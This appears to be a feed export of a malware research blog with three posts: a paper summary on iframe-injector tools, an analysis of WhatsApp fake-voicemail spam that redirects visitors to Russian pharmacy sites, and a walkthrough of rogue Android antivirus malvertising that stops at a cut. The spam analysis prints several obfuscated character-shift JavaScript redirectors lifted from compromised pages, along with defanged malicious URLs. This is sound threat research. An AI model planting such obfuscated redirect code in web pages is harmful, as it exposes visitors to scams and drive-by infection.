tag:blogger.com,1999:blog-19007298503209170402024-03-14T00:00:48.738-07:00Malware at StakeAn Official Malware Research Blog of SecNiche Security Labs. Analysis, straight from the hidden and underground.Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comBlogger99125tag:blogger.com,1999:blog-1900729850320917040.post-55282165306784750372017-05-14T10:55:00.002-07:002017-05-14T10:58:39.887-07:00[Virus Bulletin Conference] The TAO of Automated Iframe Injectors - Building Drive-by Platforms For Fun and Profit<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.virusbulletin.com/files/4614/4535/7515/logo-big.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="font-family: "georgia" , "times new roman" , serif;"><img border="0" height="86" src="https://www.virusbulletin.com/files/4614/4535/7515/logo-big.png" width="320" /></span></a></div>
<span style="font-family: "georgia" , "times new roman" , serif;"><span style="vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span id="docs-internal-guid-7fbca9fc-0815-8d8d-14ce-d4604447bd48"><span style="vertical-align: baseline; white-space: pre-wrap;">In this paper, we present the design of distributed infection model used by attackers to inject malicious iframes on the fly to conduct large scale drive-by download attacks. We use the term “Iframe Injectors” which refers to the automated tools used by attackers to trigger mass infections. The Iframe Injectors can either be standalone tools or embedded components as a part of the botnets. We discuss the classification of Iframe Injectors and dissect a number of existing tools to understand their functionalities and how they are deployed effectively.</span></span></span><br />
<span style="font-family: "georgia" , "times new roman" , serif;"><span style="vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="vertical-align: baseline; white-space: pre-wrap;"><span style="background-color: white; color: #555555; white-space: normal;">Iframes are inline frames, which are HTML objects that are embedded in a web page to fetch content (HTML or JavaScript) from a third-party domain. The content is treated as a part of the primary web page and is served when that web page is accessed. This is a known HTML functionality and is heavily used for content sharing among multiple domains. However, attackers abuse this functionality in multiple variants of drive-by download attacks </span><span style="background-color: white; color: #555555; white-space: normal;">as a part of massive iframe infection campaigns</span><span style="background-color: white; color: #555555; white-space: normal;">. An attack starts with a malicious domain that hosts malware. The attackers then embed a URL referencing the malware in an iframe and place that in a compromised website (or any other self-managed website). Users are then coerced into visiting the web page that has the iframe embedded in it. When the user visits the page, the malware is fetched from the malicious domain and the end-user system is infected.</span></span>
<span style="vertical-align: baseline; white-space: pre-wrap;"><br /></span></span><br />
<span style="font-family: "georgia" , "times new roman" , serif; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-family: "georgia" , "times new roman" , serif; vertical-align: baseline; white-space: pre-wrap;">For complete details, the paper is available here: <a href="https://www.virusbulletin.com/virusbulletin/2016/10/tao-automated-iframe-injectors-building-driveby-platforms-fun-and-profit/" target="_blank">https://www.virusbulletin.com/virusbulletin/2016/10/tao-automated-iframe-injectors-building-driveby-platforms-fun-and-profit/</a></span><br />
<span style="font-family: "georgia" , "times new roman" , serif;"><br /></span>
<span style="font-family: "georgia" , "times new roman" , serif;">PDF is available here: <a href="https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Sood-Bansal.pdf" target="_blank">https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Sood-Bansal.pdf</a></span><br />
<span style="font-family: "georgia" , "times new roman" , serif; vertical-align: baseline; white-space: pre-wrap;"><br /></span>
<span style="font-family: "georgia"; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span>Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-26099163293101879292015-09-29T22:31:00.003-07:002015-10-08T11:22:12.517-07:00[Updated] Nurturing JavaScript Obfuscation and Fast Flux DNS - "Whats App Voicemail Spamming" for Russian Online Pharmacies! <div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-l35xRxgiDxk/Vgr6B-IzS7I/AAAAAAAAB8E/7i_K7PV42BQ/s1600/whatsapp.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="155" src="http://1.bp.blogspot.com/-l35xRxgiDxk/Vgr6B-IzS7I/AAAAAAAAB8E/7i_K7PV42BQ/s200/whatsapp.jpg" width="200" /></a></div>
Recently, we analyzed that spammers are doing "Whats App Fake Voicemail" spamming to trick end-users to visit online pharmacies' websites. There are high chances that malware can be downloaded on to the end-user systems visiting these spamming websites. However, during this analysis, we did not notice that behavior.<br />
<br />
The trend of "Whats App Fake Voicemail" spamming messages is not new as we have been encountering these spamming activities for last few years. There are not significant changes in the methods of sending "Whats App Fake Voicemail" notification messages which are used to lure end-users to visit illegitimate domains. However from security research perspective, the target is to understand how this spamming attack is carried at the backend. <b>Since the "Whats App" organization brand is treated as a bait, as a result of which, there are high chances that people will click the links in the notification emails.</b> This spamming attack is targeted against broad set of users on the Internet in order to redirect them to the online pharmacies' outlets managed by Russian cyber actors. Check more on online pharmacies monetary model here : <a href="https://en.wikipedia.org/wiki/Online_pharmacy" target="_blank">https://en.wikipedia.org/wiki/Online_pharmacy</a><br />
<br />
Let's perform the analysis. The end-user receives the email notification for "Whats App Fake Voicemail" message as follows:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-OR5HOw85YkE/Vgr4Qfme56I/AAAAAAAAB74/qFvNFHBYVsk/s1600/whats_app_spam.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="289" src="http://3.bp.blogspot.com/-OR5HOw85YkE/Vgr4Qfme56I/AAAAAAAAB74/qFvNFHBYVsk/s640/whats_app_spam.png" width="640" /></a></div>
<br />
<br />
When end-user clicks the domain it is redirected to the malicious domain that serves following HTTP response headers as shown below. The landing web pages are hosted on Wordpress portal which looks like to be a compromised website. Let's take a close look on the HTTP response headers.<br />
<br />
<b><i><span style="color: purple;">GET /wp-content/themes/eStore/epanel/page_templates/js/educating.php HTTP/1.1</span></i></b><br />
<b><i><span style="color: purple;">Host<span class="Apple-tab-span" style="white-space: pre;"> </span>pasarjagakarsa.com</span></i></b><br />
<i>User-Agent<span class="Apple-tab-span" style="white-space: pre;"> </span>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0</i><br />
<i>Accept<span class="Apple-tab-span" style="white-space: pre;"> </span>text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</i><br />
<i>Accept-Language<span class="Apple-tab-span" style="white-space: pre;"> </span>en-US,en;q=0.5</i><br />
<i>Accept-Encoding<span class="Apple-tab-span" style="white-space: pre;"> </span>gzip, deflate</i><br />
<i>Connection<span class="Apple-tab-span" style="white-space: pre;"> </span>keep-alive</i><br />
<i><br /></i>
<b><i><span style="color: purple;">(Status-Line)<span class="Apple-tab-span" style="white-space: pre;"> </span>HTTP/1.1 404 Not Found</span></i></b><br />
<i>Server<span class="Apple-tab-span" style="white-space: pre;"> </span>nginx</i><br />
<i>Date<span class="Apple-tab-span" style="white-space: pre;"> </span>Tue, 29 Sep 2015 19:32:40 GMT</i><br />
<i>Content-Type<span class="Apple-tab-span" style="white-space: pre;"> </span>text/html</i><br />
<i>Transfer-Encoding<span class="Apple-tab-span" style="white-space: pre;"> </span>chunked</i><br />
<i>Connection<span class="Apple-tab-span" style="white-space: pre;"> </span>keep-alive</i><br />
<i>Vary<span class="Apple-tab-span" style="white-space: pre;"> </span>Accept-Encoding</i><br />
<i>X-Powered-By<span class="Apple-tab-span" style="white-space: pre;"> </span>PHP/5.4.44</i><br />
<i>Content-Encoding<span class="Apple-tab-span" style="white-space: pre;"> </span>gzip</i><br />
<br />
If you see the highlighted part in the HTTP response headers, it shows "404 Not Found" error which generally means resource does not exist on the web server. Infact it is not true, the web server responded back with following content as a part of web page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-HLpe2YmN2eA/VgrzWaLuKnI/AAAAAAAAB7E/pTSPnVzRc78/s1600/Screen%2BShot%2B2015-09-29%2Bat%2B1.23.12%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="184" src="http://1.bp.blogspot.com/-HLpe2YmN2eA/VgrzWaLuKnI/AAAAAAAAB7E/pTSPnVzRc78/s640/Screen%2BShot%2B2015-09-29%2Bat%2B1.23.12%2BPM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Before going further, check our earlier articles on JavaScript de-obfuscation</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li><a href="http://secniche.blogspot.com/2012/04/javascript-obfuscation-manual-armor-1.html" target="_blank">http://secniche.blogspot.com/2012/04/javascript-obfuscation-manual-armor-1.html</a></li>
<li><a href="http://secniche.blogspot.com/2012/04/javascript-obfuscation-manual-armor-2.html" target="_blank">http://secniche.blogspot.com/2012/04/javascript-obfuscation-manual-armor-2.html</a></li>
<li><a href="http://secniche.blogspot.com/2011/04/javascript-camouflaging-primer.html" target="_blank">http://secniche.blogspot.com/2011/04/javascript-camouflaging-primer.html </a></li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: left;">
If you notice, the web page has an obfuscated JavaScript embedded in it. Let's extract the obfuscated JavaScript as shown below:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-kwaIAUyc3-k/Vgrz51so5pI/AAAAAAAAB7M/-4XsESiVdyo/s1600/Screen%2BShot%2B2015-09-29%2Bat%2B1.25.45%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="268" src="http://4.bp.blogspot.com/-kwaIAUyc3-k/Vgrz51so5pI/AAAAAAAAB7M/-4XsESiVdyo/s640/Screen%2BShot%2B2015-09-29%2Bat%2B1.25.45%2BPM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The obfuscated JS is not that complex and it can be de-obfuscated easily. On de-obfuscation it was observed that the user's browser was further redirected to the following domain: "hxxp://magicorganicmarket.ru" as shown below:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-hfUm0zRXKpE/Vgr0n3Em7uI/AAAAAAAAB7U/_ZQEzN-1Gx0/s1600/Screen%2BShot%2B2015-09-29%2Bat%2B12.40.20%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="433" src="http://2.bp.blogspot.com/-hfUm0zRXKpE/Vgr0n3Em7uI/AAAAAAAAB7U/_ZQEzN-1Gx0/s640/Screen%2BShot%2B2015-09-29%2Bat%2B12.40.20%2BPM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Due to misconfiguration on the landing domain:"hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/educating.php" , the directory listing was obtained as follows:</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-LOulaqIhFoo/Vgr1IhBsB6I/AAAAAAAAB7c/SyFiX7dsG-c/s1600/Screen%2BShot%2B2015-09-29%2Bat%2B12.35.22%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="328" src="http://3.bp.blogspot.com/-LOulaqIhFoo/Vgr1IhBsB6I/AAAAAAAAB7c/SyFiX7dsG-c/s640/Screen%2BShot%2B2015-09-29%2Bat%2B12.35.22%2BPM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-XtHutClTdgA/Vgr1Sc3ltFI/AAAAAAAAB7k/GHrdTy3svIw/s1600/Screen%2BShot%2B2015-09-29%2Bat%2B12.35.47%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="234" src="http://4.bp.blogspot.com/-XtHutClTdgA/Vgr1Sc3ltFI/AAAAAAAAB7k/GHrdTy3svIw/s640/Screen%2BShot%2B2015-09-29%2Bat%2B12.35.47%2BPM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Several other malicious links with obfuscated JavaScripts were obtained and presented as follows:</div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-tab-span" style="font-family: Menlo; font-size: 14px; white-space: pre;"> </span></div>
<div style="font-family: Menlo; font-size: 14px;">
<b>hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/chatterer.php</b></div>
<div style="font-family: Menlo; font-size: 14px;">
<br /></div>
<blockquote class="tr_bq">
<b><span style="color: purple;">function celle() { cella=72; cellb=[191,177,182,172,183,191,118,188,183,184,118,180,183,171,169,188,177,183,182,118,176,186,173,174,133,111,176,188,188,184,130,119,119,182,169,188,189,186,169,180,176,173,186,170,187,183,189,188,180,173,188,118,186,189,111,131]; cellc=""; for(celld=0;celld<cellb.length;celld++) { cellc+=String.fromCharCode(cellb[celld]-cella); } return cellc; } setTimeout(celle(),1306);</span></b></blockquote>
<div style="font-family: Menlo; font-size: 14px;">
<br /></div>
<div style="font-family: Menlo; font-size: 14px;">
<span style="font-family: Times; font-size: small;">Online Pharmacy Website after De-obfuscating JS Code</span>: <b>hxxp://naturalherbsoutlet.ru/</b></div>
<div style="font-family: Menlo; font-size: 14px;">
<br /></div>
<div style="font-family: Menlo; font-size: 14px;">
<br /></div>
<div style="font-family: Menlo; font-size: 14px;">
<b>hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/elimination.php</b></div>
<div style="font-family: Menlo; font-size: 14px;">
<br /></div>
<blockquote class="tr_bq">
<b><span style="color: purple;">function sicklee() { sicklea=42; sickleb=[161,147,152,142,153,161,88,158,153,154,88,150,153,141,139,158,147,153,152,88,146,156,143,144,103,81,146,158,158,154,100,89,89,145,143,152,143,156,147,141,139,147,142,141,153,151,154,139,152,163,88,156,159,81,101]; sicklec=""; for(sickled=0;sickled<sickleb.length;sickled++) { sicklec+=String.fromCharCode(sickleb[sickled]-sicklea); } return sicklec; } setTimeout(sicklee(),1276);</span></b></blockquote>
<div style="font-family: Menlo; font-size: 14px; min-height: 16px;">
<span style="font-family: Times; font-size: small;">Online Pharmacy Website after De-obfuscating JS Code</span>: <b>hxxp://genericaidcompany.ru/</b></div>
<div style="font-family: Menlo; font-size: 14px; min-height: 16px;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="font-family: Menlo; font-size: 14px; min-height: 16px;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="font-family: Menlo; font-size: 14px;">
<b>hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/fresnel.php</b></div>
<div style="font-family: Menlo; font-size: 14px;">
<br /></div>
<blockquote class="tr_bq">
<span style="color: purple;"><b>function timee() { timea=58; timeb=[177,163,168,158,169,177,104,174,169,170,104,166,169,157,155,174,163,169,168,104,162,172,159,160,119,97,162,174,174,170,116,105,105,167,159,158,163,157,155,166,173,155,160,159,173,159,172,176,163,157,159,173,104,172,175,97,117]; timec=""; for(timed=0;timed<timeb.length;timed++) { timec+=String.fromCharCode(timeb[timed]-timea); } return timec; } setTimeout(timee(),1292);</b></span></blockquote>
<div style="font-family: Menlo; font-size: 14px; min-height: 16px;">
<span style="font-family: Times; font-size: small;">Online Pharmacy Website after De-obfuscating JS Code</span>: <b>hxxp://medicalsafeservices.ru/</b></div>
<div style="font-family: Menlo; font-size: 14px; min-height: 16px;">
<b><br /></b></div>
<div style="font-family: Menlo; font-size: 14px;">
<b>hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/js/sensitive.php</b></div>
<div style="font-family: Menlo; font-size: 14px;">
<br /></div>
<blockquote class="tr_bq">
<span style="color: purple;"><b>function risee() { risea=80; riseb=[199,185,190,180,191,199,126,196,191,192,126,188,191,179,177,196,185,191,190,126,184,194,181,182,141,119,184,196,196,192,138,127,127,192,181,194,182,181,179,196,184,181,194,178,195,199,181,178,189,177,194,196,126,194,197,119,139]; risec=""; for(rised=0;rised<riseb.length;rised++) { risec+=String.fromCharCode(riseb[rised]-risea); } return risec; } setTimeout(risee(),1314);</b></span></blockquote>
Online Pharmacy Website after De-obfuscating JS Code<span style="font-family: Menlo; font-size: 14px;">: </span><b style="text-align: center;">hxxp://perfectherbswebmart.ru/</b><br />
<b style="text-align: center;"><br /></b>
<br />
<div style="font-family: Menlo; font-size: 14px;">
<b>hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/reclaimers.php</b></div>
<div style="font-family: Menlo; font-size: 14px;">
<br /></div>
<blockquote class="tr_bq">
<b><span style="color: purple;">function likede() { likeda=62; likedb=[181,167,172,162,173,181,108,178,173,174,108,170,173,161,159,178,167,173,172,108,166,176,163,164,123,101,166,178,178,174,120,109,109,173,172,170,167,172,163,176,163,171,163,162,183,180,159,170,179,163,108,176,179,101,121]; likedc=""; for(likedd=0;likedd<likedb.length;likedd++) { likedc+=String.fromCharCode(likedb[likedd]-likeda); } return likedc; } setTimeout(likede(),1296);</span></b></blockquote>
Online Pharmacy Website after De-obfuscating JS Code<span style="font-family: Menlo; font-size: 14px;">: </span><b>hxxp://onlineremedyvalue.ru/</b><br />
<b><br /></b>
<br />
<div style="font-family: Menlo; font-size: 14px;">
<b>hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/reclaimers.php</b></div>
<blockquote class="tr_bq">
<b><span style="color: purple;">function politye() { politya=38; polityb=[157,143,148,138,149,157,84,154,149,150,84,146,149,137,135,154,143,149,148,84,142,152,139,140,99,77,142,154,154,150,96,85,85,148,135,154,155,152,135,146,150,143,146,146,147,135,146,146,84,152,155,77,97]; polityc=""; for(polityd=0;polityd<polityb.length;polityd++) { polityc+=String.fromCharCode(polityb[polityd]-politya); } return polityc; } setTimeout(politye(),1272);</span></b></blockquote>
Online Pharmacy Website after De-obfuscating JS Code<span style="font-family: Menlo; font-size: 14px;">: </span><b>hxxp://naturalpillmall.ru/</b><br />
<b><br /></b>
<br />
<div style="font-family: Menlo; font-size: 14px;">
<b>hxxp://pasarjagakarsa.com/wp-content/themes/eStore/epanel/page_templates/reclaimers.php</b></div>
<blockquote class="tr_bq">
<b><span style="color: purple;">function travellere() { travellera=56; travellerb=[175,161,166,156,167,175,102,172,167,168,102,164,167,155,153,172,161,167,166,102,160,170,157,158,117,95,160,172,172,168,114,103,103,160,157,170,154,153,164,160,167,172,168,173,170,155,160,153,171,157,102,170,173,95,115]; travellerc=""; for(travellerd=0;travellerd<travellerb.length;travellerd++) { travellerc+=String.fromCharCode(travellerb[travellerd]-travellera); } return travellerc; } setTimeout(travellere(),1290);</span></b></blockquote>
Online Pharmacy Website after De-obfuscating JS Code<span style="font-family: Menlo; font-size: 14px;">: </span><b>hxxp://herbalhotpurchase.ru/</b><br />
<b><br />[Updates]</b><br />
<br />
All the information and orders are actually handled by this primary outlet - <span style="color: #222222;"><a href="https://checkoutucxefvfq.fastcheckoutrx.com/" style="color: #1155cc;" target="_blank"><span style="font-family: inherit;"><b>hxxps://checkoutucxefvfq.<wbr></wbr>fastcheckoutrx.com/</b></span></a></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-ePd2TsQ723s/Vg2SQmMhdkI/AAAAAAAAB8Y/2wNNfBT1hPU/s1600/Screen%2BShot%2B2015-10-01%2Bat%2B1.05.05%2BPM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="304" src="http://4.bp.blogspot.com/-ePd2TsQ723s/Vg2SQmMhdkI/AAAAAAAAB8Y/2wNNfBT1hPU/s640/Screen%2BShot%2B2015-10-01%2Bat%2B1.05.05%2BPM.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We performed tests at the network level to understand on how the name servers were configured and we found that DNS fluxing was used in this campaign. <span style="line-height: 16px;">The Time-To-Live (TTL) field is set for 600 seconds and after the IP address of the domain changes. </span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Here is an example:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div style="line-height: 16px;">
<span style="font-family: inherit;"><b>perfectherbswebmart.ru. 600 IN A 82.199.121.167</b></span></div>
<div style="line-height: 16px;">
<span style="font-family: inherit;"><b>perfectherbswebmart.ru. 600 IN A 198.144.158.52</b></span></div>
<div style="line-height: 16px;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Some analytical points for consideration:</div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<ul>
<li>Overall extensive ".ru" domains have been used in this spamming campaign.</li>
<li>One can conclude that automated spam-code generation tools have been used in this campaign to ease out the process of large scale infection</li>
<ul>
<li>For example:- infecting PHP pages with JavaScript obfuscated code hosted on the compromised websites</li>
</ul>
<li>The campaign looks like to be executed at an extensive level considering the artefacts.</li>
<ul>
<li>Many similar instances of JavaScript obfuscation have been analyzed as presented above</li>
<li>A number of online pharmacy websites found after de-obfuscating the JavaScript:</li>
<ul>
<li><b><span style="font-family: Times, Times New Roman, serif;">hxxp://herbalhotpurchase.ru/</span></b></li>
<li><b><b><span style="font-family: Times, Times New Roman, serif;">hxxp://naturalpillmall.ru/</span></b></b></li>
<li><b><b><span style="font-family: Times, Times New Roman, serif;">hxxp://onlineremedyvalue.ru/</span></b></b></li>
<li><b><b><b style="text-align: center;"><span style="font-family: Times, Times New Roman, serif;">hxxp://perfectherbswebmart.ru/</span></b></b></b></li>
<li><b><b><b style="text-align: center;"><b style="text-align: start;"><span style="font-family: Times, Times New Roman, serif;">hxxp://medicalsafeservices.ru/</span></b></b></b></b></li>
<li><b><b><b style="text-align: center;"><b style="text-align: start;"><b><span style="font-family: Times, Times New Roman, serif;">hxxp://genericaidcompany.ru/</span></b></b></b></b></b></li>
<li><b><b><b style="text-align: center;"><b style="text-align: start;"><b><b><span style="font-family: Times, Times New Roman, serif;">hxxp://naturalherbsoutlet.ru/</span></b></b></b></b></b></b></li>
</ul>
</ul>
</ul>
<ul>
<li>We believe that this is just the tip of the iceberg and there will be many more</li>
</ul>
<div class="separator" style="clear: both; text-align: left;">
We won't be surprised if the same tactics are used for drive-by download instead of spamming in particular.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Note:</b> At the time of drafting this post, all the websites were active.</div>
<br />
Stay Secure !Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comtag:blogger.com,1999:blog-1900729850320917040.post-69169469607076414802015-05-11T11:14:00.000-07:002015-05-11T11:14:15.263-07:00"Armor for Android" - Rogue Marketing but Real Business - Who Cares for Ethics !<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-lS9tMO4kX88/VUbXQQUZegI/AAAAAAAAB1w/v-26gVeUgBU/s1600/armor.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="248" src="http://2.bp.blogspot.com/-lS9tMO4kX88/VUbXQQUZegI/AAAAAAAAB1w/v-26gVeUgBU/s1600/armor.png" width="320" /></a></div>
<b>Malvertisements and Fake AVs Outline: </b>Since Android is an open-source mobile platform, it is targeted by attackers for malicious purposes. Android applications are served through malicious advertisements. One of the widely used technique is to raise fake anti-virus alerts in the form of advertisements and then providing a fake solution in the form of anti-virus application which is basically nothing but a malicious application designed either to steal information or asking for some ransom or asking for money to activate the license of fake anti-virus. One or the other way, information or money is desired from the end-users by selling "risk or threat" through malicious advertisements. All of this is fake but the end-users who are not knowledgeable fall for this trap and end up either providing money or information.<br />
<br />
<b>Interestingly, businesses are also using the nefarious tactics to scare the users to install applications through dubious means</b>. Read this for the reality of "Android for Armor" <b><a href="http://www.androidauthority.com/armor-for-android-342192/" target="_blank">http://www.androidauthority.com/armor-for-android-342192/</a>.</b> Several outlets call "Armor for Android" application as rogue. Interestingly, "Android for Armor" built its business using information provided by VirusTotal.com as highlighted here by the Naked Security blog post - <b><a href="https://nakedsecurity.sophos.com/2013/01/10/a-chink-in-android-armour/" target="_blank">https://nakedsecurity.sophos.com/2013/01/10/a-chink-in-android-armour/</a>. Even the virus-total now considered this application as malicious</b> - <b><a href="https://www.virustotal.com/en/file/af518ec81e4ddb7b08048b7924c7f63e55c654a702f5c62ebf3e83d39c51bab2/analysis/1430705447/" target="_blank">https://www.virustotal.com/en/file/af518ec81e4ddb7b08048b7924c7f63e55c654a702f5c62ebf3e83d39c51bab2/analysis/1430705447/</a></b><br />
<br />
We have been watching this trend for couple of months and thought to do a brief analysis of this complete process. We still treat this application as fake or rogue based on the methods use to install Android application on the end-users' phones.<br />
<br />
Let's take a look at the recent malicious advertisement campaign for installing "Armor for Android", a so-called authentic application which is advertised to provide effective anti-virus services. <b>Amazingly, "Armor for Android" is still rolling in the market despite of such bad business practices and latest campaign is discussed in this post.</b> The questions that need critical thinking are:<br />
<ol>
<li><b><i>Is there any value in ethical business models in online advertisements?</i></b></li>
<li><b><i>How can we obtain users' trust if rogue business tactics are used?</i></b></li>
</ol>
Let's take a look into installation (alias to malvertisement) process of "Armor-for-Android" application step-by-step:<br />
<br />
<b>Step 1:</b> The landing website generates an error notification as shown below and highlights that users's Galaxy Nexus phone is infected.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-oWahAM9kU0A/VPP8l5l9o4I/AAAAAAAAB0E/pMyIl8WZ1SA/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="361" src="http://4.bp.blogspot.com/-oWahAM9kU0A/VPP8l5l9o4I/AAAAAAAAB0E/pMyIl8WZ1SA/s1600/5.png" width="640" /></a></div>
<br />
<br />
<b>Step 2:</b> After accepting the notification, it is highlighted that underlined system is infected with "Hornyworm.apk".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-bqKkuL1M5JA/VPP8vfZbn8I/AAAAAAAAB0M/g8k1Lrt1NeE/s1600/android_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="372" src="http://3.bp.blogspot.com/-bqKkuL1M5JA/VPP8vfZbn8I/AAAAAAAAB0M/g8k1Lrt1NeE/s1600/android_1.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Step 3: </b>After a time interval of few seconds, a fake message appears which shows that the user's Android phone is in scanning phase and it offers a solution to download an anti-virus application.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-42PopPiBISg/VPP82ZW5dhI/AAAAAAAAB0U/wcB3euLeO_g/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="362" src="http://4.bp.blogspot.com/-42PopPiBISg/VPP82ZW5dhI/AAAAAAAAB0U/wcB3euLeO_g/s1600/2.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Step 4:</b> After a few seconds, an Android application is served as follows:</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-d0aKdhJZC9E/VPP9AuCVubI/AAAAAAAAB0c/7Pt1iTxKezI/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="362" src="http://4.bp.blogspot.com/-d0aKdhJZC9E/VPP9AuCVubI/AAAAAAAAB0c/7Pt1iTxKezI/s1600/3.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Step 5: </b>The website also shows how exactly the application needs to be installed.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-OOZrEOOs7e0/VPP9RsHC27I/AAAAAAAAB0k/2ZjofSioFl0/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="364" src="http://4.bp.blogspot.com/-OOZrEOOs7e0/VPP9RsHC27I/AAAAAAAAB0k/2ZjofSioFl0/s1600/4.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The complete HTTP network flow is presented below to show various websites that are hopped by the end-user's Android phone.</div>
<br />
